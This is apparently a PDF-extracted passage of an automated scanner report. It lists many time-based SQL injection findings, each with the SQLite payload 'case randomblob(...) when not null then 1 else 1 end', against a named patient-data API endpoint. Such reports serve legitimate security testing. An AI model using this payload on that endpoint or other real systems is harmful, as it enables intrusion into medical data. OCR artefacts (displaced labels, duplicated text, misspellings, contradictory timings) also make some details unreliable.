The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,670] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [5,784] milliseconds, when the original unmodified query with value [37] took [1,782] milliseconds.

Other Info

URL

Evidence

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(10000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2.835] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,219] milliseconds, when the original unmodified query with

value [234] took [2,052] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,835] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,219] milliseconds, when the original unmodified query with value [234] took [2,052] milliseconds.

Other Info

URL

Evidence

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(10000000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [264] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the

request to take [372] milliseconds, when the original unmodified query with value [493] took [258] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [264] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [372] milliseconds, when the original unmodified query with value [493] took

[258] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(10000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [264] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [821] milliseconds, when the original unmodified query with value [162] took [1,110]

milliseconds.

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [264] milliseconds, parameter value Other [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to Info take [821] milliseconds, when the original unmodified query with value [162] took [1,110] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(10000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [269] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,528] milliseconds, when the original unmodified query with value [200] took [1,381]

milliseconds.

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [269] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,528] milliseconds, when the original unmodified query with value [200] took [1,381]

milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(10000000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [269] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [439] milliseconds, when the original unmodified query with value [601] took [878]

milliseconds.

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [269] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [439] milliseconds, when the original unmodified query with value [601] took [878] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(10000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,418] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,539] milliseconds, when the original unmodified query with

value [769] took [1,359] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

Evidence

Evidence

Other Info

Evidence

Other Info

URL

not null then 1 else 1 end], which caused the request to take [3,418] milliseconds. Other Info

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,539] milliseconds, when the original unmodified query with

value [769] took [1,359] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [3,683] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [5,541] milliseconds, when the original unmodified query with

value [893] took [3,553] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [3,683] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [5,541] milliseconds, when the original unmodified query with

value [893] took [3,553] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(10000000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [770] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to

take [2,289] milliseconds, when the original unmodified guery with value [164] took [1,071]

milliseconds.

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [770] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,289] milliseconds, when the original unmodified query with value [164] took [1,071]

milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

case randomblob(10000000) when not null then 1 else 1 end Attack

The guery time is controllable using parameter value [case randomblob(10000000) when not

null then 1 else 1 end], which caused the request to take [771] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,048] milliseconds, when the original unmodified query with value [230] took [4,102]

milliseconds.

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [771] milliseconds, parameter value

[case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,048] milliseconds, when the original unmodified guery with value [230] took [4,102]

milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(10000000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [773] milliseconds, parameter value

> [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,552] milliseconds, when the original unmodified query with value [181] took [1,717]

milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [773] milliseconds, parameter

Other

Other Info

Evidence

Attack

Evidence

Other Info

Method

Evidence

Other Info

Info value [case randomblob(100000000) when not null then 1 else 1 end], which caused the

request to take [2,552] milliseconds, when the original unmodified query with value [181]

took [1,717] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Evidence

Other

Evidence

Other

Evidence

Other

Evidence

Other

Info

Info

Info

Info

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [782] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,953] milliseconds, when the original unmodified query with value [239] took [1,414]

milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [782] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,953] milliseconds, when the original unmodified query with value [239] took [1,414]

milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [825] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,384] milliseconds, when the original unmodified query with value [164] took [1,652]

milliseconds.

milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [825] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,384] milliseconds, when the original unmodified query with value [164] took [1,652]

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [856] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,052] milliseconds, when the original unmodified query with value [604] took [1,283]

milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [856] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,052] milliseconds, when the original unmodified query with value [604] took [1,283]

milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [878] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,095] milliseconds, when the original unmodified query with value [54] took [3,048]

milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [878] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,095] milliseconds, when the original unmodified query with value [54] took [3,048] milliseconds

milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack case randomblob(10000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [930] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,927] milliseconds, when the original unmodified query with value [600] took [872]

milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [930] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,927] milliseconds, when the original unmodified query with value [600] took [872]

milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(10000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [979] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,011] milliseconds, when the original unmodified query with value [205] took [1,030]

milliseconds.

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [979] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,011] milliseconds, when the original unmodified guery with value [205] took [1,030]

milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [980] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,631] milliseconds, when the original unmodified query with value [10] took [1,072]

milliseconds.

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [980] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,631] milliseconds, when the original unmodified query with value [10] took [1,072]

milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,044] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,576] milliseconds, when the original unmodified query with

value [205] took [4,175] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,044] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,576] milliseconds, when the original unmodified query with

value [205] took [4,175] milliseconds.

https://api.velmeni.ai/api/patient/scan/save doctor feedback

POST Method

Attack

case randomblob(100000000) when not null then 1 else 1 end

Other Info

Evidence

Evidence

Other

Info

Attack

Evidence

Other

Info

Evidence

Other Info

URL

Evidence

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,103] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,245] milliseconds, when the original unmodified query with value [203] took [2,698] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,103] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,245] milliseconds, when the original unmodified query with value [203] took [2,698] milliseconds.

URL

Attack

Evidence

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,254] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [4,124] milliseconds, when the original unmodified query with

value [125] took [1,234] milliseconds.

value [125] took [1,234] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,254] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [4,124] milliseconds, when the original unmodified query with

Other Info

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,264] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [3,210] milliseconds, when the original unmodified query with

value [344.1973797966452] took [991] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,264] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,210] milliseconds, when the original unmodified query with

Other Info

URL

Evidence

value [344.1973797966452] took [991] milliseconds.
https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,278] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [1,554] milliseconds, when the original unmodified query with

value [220] took [1,385] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,278] milliseconds,

Other Info

Evidence

not null then 1 else 1 end], which caused the request to take [1,278] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,554] milliseconds, when the original unmodified query with value [220] took [1,385] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,426] milliseconds.

Evidence

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [7,335] milliseconds, when the original unmodified query with value [147] took [4,138] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,426] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [7,335] milliseconds, when the original unmodified query with value [147] took [4,138] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,540] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [4,674] milliseconds, when the original unmodified query with

value [188] took [3,916] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,540] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [4,674] milliseconds, when the original unmodified query with value [188] took [3,916] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,553] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [3,697] milliseconds, when the original unmodified query with value [1095] took [2,610] milliseconds.

Other

Info

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,553] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [3,697] milliseconds, when the original unmodified query with value [1095] took [2,610] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,579] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [3,108] milliseconds, when the original unmodified query with value [173] took [1,044] milliseconds.

Other

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,579] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [3,108] milliseconds, when the original unmodified query with value [173] took [1,044] milliseconds.

Info

URL

https://api.velmeni.ai/api/patient/scan/save doctor feedback

Method

POST

Attack

case randomblob(100000000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,651] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,736] milliseconds, when the original unmodified query with value [208] took [2,856] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,651] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,736] milliseconds, when the original unmodified query with value [208] took [2,856] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Evidence

Other

Evidence

Other

Evidence

Other

Info

Info

Info

Attack case randomblob(100000000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,801] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [2,283] milliseconds, when the original unmodified query with

value [186] took [772] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,801] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,283] milliseconds, when the original unmodified query with

value [186] took [772] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,815] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [4,931] milliseconds, when the original unmodified query with

value [10] took [913] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,815] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,931] milliseconds, when the original unmodified query with

value [10] took [913] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor-feedback

Method POST

Attack case randomblob(100000000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,992] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [3,503] milliseconds, when the original unmodified query with

value [247] took [1,800] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,992] milliseconds,

parameter value [case randomblob(1000000000)) when not null then 1 else 1 end], which caused the request to take [3,503] milliseconds, when the original unmodified query with

value [247] took [1,800] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(100000000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,994] milliseconds,

Evidence parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [4,954] milliseconds, when the original unmodified query with

value [181] took [3,110] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [1,994] milliseconds,

Other parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

Info caused the request to take [4,954] milliseconds, when the original unmodified query with

value [181] took [3,110] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor-feedback

Method POST

case randomblob(100000000) when not null then 1 else 1 end Attack

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,032] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which Evidence

caused the request to take [5,887] milliseconds, when the original unmodified query with

value [181] took [2,034] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,032] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [5,887] milliseconds, when the original unmodified query with

value [181] took [2,034] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000000) when not null then 1 else 1 end Attack

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,042] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [2,833] milliseconds, when the original unmodified query with

value [112] took [1,993] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,042] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [2,833] milliseconds, when the original unmodified query with

value [112] took [1,993] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(100000000) when not null then 1 else 1 end Attack

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,131] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [3,575] milliseconds, when the original unmodified query with

value [276] took [4,101] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,131] milliseconds.

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [3,575] milliseconds, when the original unmodified query with

value [276] took [4,101] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,210] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [3,416] milliseconds, when the original unmodified query with

value [215] took [3,279] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,210] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [3,416] milliseconds, when the original unmodified query with

value [215] took [3,279] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor feedback

Evidence

Other

Info

Other Info

Evidence

Other

Info

URL

Evidence

Other Info

Method **POST**

case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,301] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,795] milliseconds, when the original unmodified query with

value [222] took [3,521] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,301] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [2,795] milliseconds, when the original unmodified query with

value [222] took [3,521] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

Attack case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,488] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [4,784] milliseconds, when the original unmodified query with

value [171] took [3,898] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,488] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [4,784] milliseconds, when the original unmodified query with

value [171] took [3,898] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,509] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which Evidence

caused the request to take [2,906] milliseconds, when the original unmodified query with

value [904] took [1,279] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,509] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,906] milliseconds, when the original unmodified query with

value [904] took [1,279] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(100000000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,542] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [2,655] milliseconds, when the original unmodified query with

value [407] took [2,820] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,542] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,655] milliseconds, when the original unmodified query with

value [407] took [2,820] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000000) when not null then 1 else 1 end

Attack

Evidence

Other Info

Method

Evidence

Other Info

Attack

Other

Info

Evidence

Other Info

Attack

Evidence

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,557] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [8,708] milliseconds, when the original unmodified query with value [86] took [1,447] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,557] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [8,708] milliseconds, when the original unmodified query with value [86] took [1,447] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(100000000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,193] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [3,612] milliseconds, when the original unmodified query with

value [833] took [256] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,193] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [3,612] milliseconds, when the original unmodified query with

value [833] took [256] milliseconds.

Info

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(100000000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,296] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [3,742] milliseconds, when the original unmodified query with

value [193] took [2,582] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,296] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [3,742] milliseconds, when the original unmodified query with

value [193] took [2,582] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [759] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [843] milliseconds, when the original unmodified query with value [314] took

[2,032] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [759] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [843] milliseconds, when the original unmodified query with value [314] took [2,032] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [782] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the

Other

Evidence

Attack

Evidence

Other Info

Evidence

Info

Other

request to take [1,596] milliseconds, when the original unmodified query with value [164]

took [2,175] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [782] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,596] milliseconds, when the original unmodified query with value [164] took [2,175] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(100000000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [792] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,393] milliseconds, when the original unmodified guery with value [360]

took [2,203] milliseconds.

Other Info

Evidence

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [792] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,393] milliseconds, when the original unmodified query with value [360] took [2,203] milliseconds.

